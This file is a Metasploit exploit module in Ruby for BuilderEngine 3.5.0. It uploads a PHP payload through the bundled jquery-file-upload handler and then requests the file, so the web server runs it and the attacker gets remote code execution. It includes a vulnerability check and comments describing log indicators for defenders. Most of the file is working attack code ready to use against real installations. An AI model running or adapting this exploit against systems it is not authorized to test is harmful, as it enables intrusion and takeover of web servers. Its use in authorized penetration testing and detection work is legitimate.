Path: blob/master/modules/exploits/multi/http/builderengine_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for BuilderEngine 3.5.0 (EDB 40390, see references below): uploads a PHP
# file through the bundled jquery-file-upload server endpoint, then requests it so the web
# server executes it. Both requests use fixed, literal paths, so for defenders the indicator
# is a POST to .../themes/dashboard/assets/plugins/jquery-file-upload/server/php/ followed by
# a GET to files/<random>.php from the same client in the web-server logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # FileDropper supplies register_file_for_cleanup; HttpClient supplies send_request_cgi,
  # normalize_uri, target_uri and rhost/rport used below.
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options. The only user-facing option is TARGETURI, the base path
  # under which BuilderEngine is installed (defaults to '/').
  #
  # @param info [Hash] metadata merged by update_info before being passed to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "BuilderEngine Arbitrary File Upload Vulnerability and execution",
        'Description' => %q{
          This module exploits a vulnerability found in BuilderEngine 3.5.0
          via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious
          file, which would result in arbitrary remote code execution under the context of
          the web server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'metanubix', # PoC
          'Marco Rivoli' # Metasploit
        ],
        'References' => [
          ['EDB', '40390']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['BuilderEngine 3.5.0', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2016-09-18',
        'DefaultTarget' => 0,
        # All three notes are left UNKNOWN; nothing in this module was characterised for them.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])
      ]
    )
  end

  # Vulnerability check: GETs the jquery-file-upload PHP handler directory under TARGETURI.
  # Any HTTP 200 with a non-empty body is reported as Appears; no product or version string is
  # inspected, so a reachable handler -- or a catch-all page that answers 200 for any path --
  # yields a positive result. Read it as "endpoint present", not "confirmed vulnerable".
  #
  # @return [Exploit::CheckCode] Appears when the handler path answers 200 with content, Safe otherwise
  def check
    uri = target_uri.path
    # Appends the trailing slash in place; exploit below skips this step and relies on
    # normalize_uri instead. In-place mutation is only safe if target_uri.path returns a fresh,
    # unfrozen String on each call -- TODO confirm.
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')
    })

    if res && res.code == 200 && !res.body.blank?
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Uploads the payload as a PHP file and then requests it. Aborts through fail_with (which
  # raises) when the upload request gets no response or a reply the success test rejects.
  def exploit
    uri = target_uri.path

    # Only used for the UnexpectedReply message below.
    peer = "#{rhost}:#{rport}"
    # Random alphabetic name of 8..15 characters plus '.php'; the same name is registered for cleanup.
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    data = Rex::MIME::Message.new
    # One random leading character, then the PHP open tag, the framework-encoded payload and a close tag.
    payload_encoded = Rex::Text.rand_text_alpha(1)
    payload_encoded << "<?php "
    payload_encoded << payload.encoded
    payload_encoded << " ?>\r\n"
    # Single multipart part carried in a form field named files[], with the random filename.
    data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    if res
      # Success test is loose: the alternation matches any 200 body containing the word "files"
      # (an upload handler's error JSON would qualify), not only one echoing the uploaded name,
      # and the '.' in php_pagename is interpolated unescaped. A false positive here leads to the
      # GET below for a file that was never written and a cleanup entry with nothing to remove.
      if res.code == 200 && res.body =~ /files|#{php_pagename}/
        print_good("Our payload is at: #{php_pagename}. Calling payload...")
        # Registered as a bare filename; whether FileDropper resolves it relative to the files/
        # directory the GET below uses is not visible from this module -- TODO confirm.
        register_file_for_cleanup(php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      # No response at all (timeout / connection failure); the message carries no detail.
      fail_with(Failure::Unknown, 'ERROR')
    end

    print_status("Calling payload...")
    # Triggers execution by fetching the uploaded file from files/ under TARGETURI.
    # The response to this request is not examined.
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'files/', php_pagename)
    )
  end
end